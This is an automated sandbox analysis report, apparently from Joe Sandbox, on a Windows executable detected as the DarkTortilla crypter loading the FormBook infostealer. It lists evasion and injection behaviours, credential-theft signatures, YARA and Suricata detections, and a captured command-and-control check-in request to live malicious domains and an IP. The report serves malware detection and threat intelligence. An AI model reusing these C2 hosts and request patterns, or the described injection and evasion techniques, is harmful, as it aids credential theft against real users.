Edit tour

Windows Analysis Report
0Z2lZiPk5K.exe

Overview

General Information

Sample name:	0Z2lZiPk5K.exe renamed because original name is a hash value
Original sample name:	fcdefe2bc868f4c16ed735bd0200b3fc71a485ec9b08681463ed0618f209944e.exe
Analysis ID:	1586023
MD5:	e4755754426a643cc7210791a682d80b
SHA1:	79a1b7d1d916b31306d533b9ef8be943327ff791
SHA256:	fcdefe2bc868f4c16ed735bd0200b3fc71a485ec9b08681463ed0618f209944e
Tags:	exeuser-adrian__luca
Infos:

Detection

DarkTortilla, FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

Yara detected FormBook

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Found direct / indirect Syscall (likely to bypass EDR)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to launch a process as a different user

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0Z2lZiPk5K.exe (PID: 6496 cmdline: "C:\Users\user\Desktop\0Z2lZiPk5K.exe" MD5: E4755754426A643CC7210791A682D80B)

AddInProcess32.exe (PID: 1188 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)

ONQMbShhwr.exe (PID: 3168 cmdline: "C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

RmClient.exe (PID: 5684 cmdline: "C:\Windows\SysWOW64\RmClient.exe" MD5: CE765DCC7CDFDC1BFD94CCB772C75E41)

ONQMbShhwr.exe (PID: 2108 cmdline: "C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 5376 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000007.00000002.2927376877.0000000000920000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000007.00000002.2926133034.0000000000790000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000009.00000002.2928989323.00000000051C0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.2925502750.00000000004F0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.2461565241.00000000018D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.2927181346.0000000004380000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2175253343.0000000002D61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000003.00000002.2463556567.0000000003170000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: 0Z2lZiPk5K.exe PID: 6496	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: 0Z2lZiPk5K.exe PID: 6496	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
3.2.AddInProcess32.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.AddInProcess32.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.0Z2lZiPk5K.exe.55b0000.6.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.0Z2lZiPk5K.exe.55b0000.6.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) M5

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T16:23:21.303236+0100	2050745	1	Malware Command and Control Activity Detected	192.168.2.4	50008	134.122.133.80	80	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T16:23:21.303236+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50008	134.122.133.80	80	TCP

HTTP traffic detected: GET /ah2l/?Ud=0XIysXmjicdWgm2Fao/GzBVFV7BHxJICrB9qe1pxW9F6KmTtpKViQSnjO8JFZFRtQOT2SKyqDZIyiHstHNrb6XHUFKDI8ax1U9tOs3GxgCtVp10eokz4wwo=&ZjQ=-JvPDv0h-Nt8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.jrcov55qgcxp5fwa.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 5.0.2; LG-D722 Build/LRX22G.A1429531854) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/34.0.1847.118 Mobile Safari/537.36

Source: global traffic	DNS traffic detected: DNS query: www.1337street.shop
Source: global traffic	DNS traffic detected: DNS query: www.mosquitoxp.lol
Source: global traffic	DNS traffic detected: DNS query: www.clubhoodies.shop
Source: global traffic	DNS traffic detected: DNS query: www.jrcov55qgcxp5fwa.top

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Wed, 08 Jan 2025 15:23:21 GMTServer: nginxX-Cache: BYPASSConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2208429137.00000000076A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 0Z2lZiPk5K.exe	String found in binary or memory: https://api.solubility.com/?substance=
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033OBo
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: RmClient.exe, 00000007.00000002.2926246142.000000000084A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: RmClient.exe, 00000007.00000003.2807701165.00000000075C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: RmClient.exe, 00000007.00000002.2929901223.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2927376877.0000000000920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2926133034.0000000000790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2928989323.00000000051C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2460765366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2925502750.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2461565241.00000000018D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2927181346.0000000004380000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2463556567.0000000003170000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0042C083 NtClose,	3_2_0042C083
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0040AA68 NtAllocateVirtualMemory,	3_2_0040AA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992B60 NtClose,LdrInitializeThunk,	3_2_01992B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_01992DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_01992C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019935C0 NtCreateMutant,LdrInitializeThunk,	3_2_019935C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01994340 NtSetContextThread,	3_2_01994340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01994650 NtSuspendThread,	3_2_01994650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992B80 NtQueryInformationFile,	3_2_01992B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992BA0 NtEnumerateValueKey,	3_2_01992BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992BF0 NtAllocateVirtualMemory,	3_2_01992BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992BE0 NtQueryValueKey,	3_2_01992BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992AB0 NtWaitForSingleObject,	3_2_01992AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992AD0 NtReadFile,	3_2_01992AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992AF0 NtWriteFile,	3_2_01992AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992DB0 NtEnumerateKey,	3_2_01992DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992DD0 NtDelayExecution,	3_2_01992DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992D10 NtMapViewOfSection,	3_2_01992D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992D00 NtSetInformationFile,	3_2_01992D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992D30 NtUnmapViewOfSection,	3_2_01992D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992CA0 NtQueryInformationToken,	3_2_01992CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992CC0 NtQueryVirtualMemory,	3_2_01992CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992CF0 NtOpenProcess,	3_2_01992CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992C00 NtQueryInformationProcess,	3_2_01992C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992C60 NtCreateKey,	3_2_01992C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992F90 NtProtectVirtualMemory,	3_2_01992F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992FB0 NtResumeThread,	3_2_01992FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992FA0 NtQuerySection,	3_2_01992FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992FE0 NtCreateFile,	3_2_01992FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992F30 NtCreateSection,	3_2_01992F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992F60 NtCreateProcessEx,	3_2_01992F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992E80 NtReadVirtualMemory,	3_2_01992E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992EA0 NtAdjustPrivilegesToken,	3_2_01992EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992EE0 NtQueueApcThread,	3_2_01992EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01992E30 NtWriteVirtualMemory,	3_2_01992E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01993090 NtSetValueKey,	3_2_01993090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01993010 NtOpenDirectoryObject,	3_2_01993010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019939B0 NtGetContextThread,	3_2_019939B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01993D10 NtOpenProcessToken,	3_2_01993D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01993D70 NtOpenThread,	3_2_01993D70
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE4340 NtSetContextThread,LdrInitializeThunk,	7_2_02EE4340
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE4650 NtSuspendThread,LdrInitializeThunk,	7_2_02EE4650
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2AF0 NtWriteFile,LdrInitializeThunk,	7_2_02EE2AF0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2AD0 NtReadFile,LdrInitializeThunk,	7_2_02EE2AD0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2BE0 NtQueryValueKey,LdrInitializeThunk,	7_2_02EE2BE0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_02EE2BF0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2BA0 NtEnumerateValueKey,LdrInitializeThunk,	7_2_02EE2BA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2B60 NtClose,LdrInitializeThunk,	7_2_02EE2B60
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2EE0 NtQueueApcThread,LdrInitializeThunk,	7_2_02EE2EE0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2E80 NtReadVirtualMemory,LdrInitializeThunk,	7_2_02EE2E80
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2FE0 NtCreateFile,LdrInitializeThunk,	7_2_02EE2FE0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2FB0 NtResumeThread,LdrInitializeThunk,	7_2_02EE2FB0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2F30 NtCreateSection,LdrInitializeThunk,	7_2_02EE2F30
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_02EE2CA0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2C60 NtCreateKey,LdrInitializeThunk,	7_2_02EE2C60
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02EE2C70
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02EE2DF0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_02EE2DD0
Source: C:\Windows\SysWOW64\RmClient.exe	Code function: 7_2_02EE2D30 NtUnmapViewOfSection,LdrInitializeThunk,	7_2_02EE2D30
